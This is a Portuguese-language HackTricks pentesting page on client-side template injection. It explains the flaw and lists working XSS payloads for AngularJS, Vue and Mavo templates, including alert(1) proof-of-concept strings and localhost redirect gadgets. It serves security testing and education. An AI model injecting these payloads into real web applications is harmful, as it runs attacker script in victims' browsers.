hacktricks/pentesting-web/client-side-template-injection-csti.md

6.8 KiB

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Resumo

É como uma Injeção de Template no Lado do Servidor mas no cliente. O SSTI pode permitir que você execute código no servidor remoto, o CSTI poderia permitir que você execute código JavaScript arbitrário no navegador da vítima.

Testar essa vulnerabilidade é muito similar ao caso do SSTI, o interpretador espera um template e o executará. Por exemplo, com um payload como {{ 7-7 }}, se o aplicativo for vulnerável, você verá um 0, e se não for, você verá o original: {{ 7-7 }}

AngularJS

AngularJS é um framework JavaScript amplamente utilizado que interage com o HTML por meio de atributos conhecidos como diretivas, sendo uma notável o ng-app. Essa diretiva permite que o AngularJS processe o conteúdo HTML, possibilitando a execução de expressões JavaScript dentro de chaves duplas.

Em cenários onde a entrada do usuário é inserida dinamicamente no corpo HTML marcado com ng-app, é possível executar código JavaScript arbitrário. Isso pode ser alcançado aproveitando a sintaxe do AngularJS dentro da entrada. Abaixo estão exemplos que demonstram como o código JavaScript pode ser executado:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Pode encontrar um exemplo online muito básico da vulnerabilidade no AngularJS em http://jsfiddle.net/2zs2yv7o/ e no Burp Suite Academy

{% hint style="danger" %} O Angular 1.6 removeu o sandbox então a partir desta versão um payload como {{constructor.constructor('alert(1)')()}} ou <input ng-focus=$event.view.alert('XSS')> deve funcionar. {% endhint %}

VueJS

Pode encontrar uma implementação vulnerável do Vue em https://vue-client-side-template-injection-example.azu.now.sh/
Payload funcional: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

E o código fonte do exemplo vulnerável aqui: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

Um post muito bom sobre CSTI em VUE pode ser encontrado em https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Crédito: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Crédito: Mario Heiderich

Verifique mais payloads VUE em https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Mais payloads em https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Lista de Detecção de Força Bruta

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: